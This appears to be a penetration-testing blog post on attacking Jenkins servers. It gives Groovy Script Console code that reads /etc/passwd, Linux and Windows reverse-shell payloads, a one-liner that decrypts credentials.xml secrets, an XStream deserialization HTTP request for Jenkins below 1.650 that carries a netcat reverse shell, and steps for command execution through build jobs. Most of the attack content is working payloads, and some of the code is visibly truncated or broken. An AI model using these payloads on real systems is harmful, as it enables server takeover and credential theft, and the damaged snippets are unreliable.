Jenkins Script Console Code Exec & Reverse Shell & Java Deserialization

You can often come across with Jenkins Script Console without any authentication.
Here you can find the some code execution scripts which can help you to run some commands and even get a reverse shell depending on the Operating System version.

Jenkins Code Execution via Script Console

def command = "cat /etc/passwd"
def proc = command.execute()

println "Process exit code: ${proc.exitValue()}"
println "Std Err: ${proc.err.text}"
println "Std Out: ${}"

Getting Reverse Shell on Linux Machine

We can simply use Java Reverse Shell from pentestmonkey.

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])

Getting Reverse Shell on Windows Machine

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()&gt;0)so.write(;while(pe.available()&gt;0)so.write(;while(si.available()&gt;0)po.write(;so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Extracting passphrase from Jenkins’ credentials.xml

Credentials.xml can be found under the Jenkins installation folder which may help us to have another password and perhaps getting root/administrative access on the server. In order to check how to get credentials, please see the post here.

println( hudson.util.Secret.decrypt("Content_of_credentials.xml") )

Additional Resource can be found here:—toying-with-powersploit/

Jenkins xstream Deserialization

Jenkins < 1.650

A simple netcat reverse shell payload can help us to get a reverse shell.

POST /createItem?name=random HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/xml
Content-Length: 759
                    <delegate class="groovy.util.Expando"/>
                    <owner class="java.lang.ProcessBuilder">
                   <command>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f</command>

If you would like to only test the vulnerability in a pentest engagement. You can simply use the ping command as below and replace the command line with: ping -c 3 IP

<command>ping-c 3</command>

Listen the ICMP traffic with tcpdump, make sure to replace the interface if you are using other interface rather than eth0:

tcpdump -ni eth0 icmp

If all goes well, you will have the output as below:

[email protected]:~# tcpdump -ni eth0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
09:55:33.571449 IP &gt; ICMP echo request, id 18015, seq 1, length 64
09:55:33.571851 IP &gt; ICMP echo reply, id 18015, seq 1, length 64
09:55:34.574175 IP &gt; ICMP echo request, id 18015, seq 2, length 64
09:55:34.574231 IP &gt; ICMP echo reply, id 18015, seq 2, length 64
09:55:35.577863 IP &gt; ICMP echo request, id 18015, seq 3, length 64
09:55:35.577918 IP &gt; ICMP echo reply, id 18015, seq 3, length 64

If we are not able to access the Script Console but have access rights to build a project then we can also run OS commands.

Configure -> General -> Add build step -> Execute Windows batch command / Execute shell -> Save -> Build Now -> Find the last project and right click -> console output

We can run Windows OS commands using the Execute Windows batch command. In order to run Linux OS commands we can use the Execute Shell option.

Leave a Comment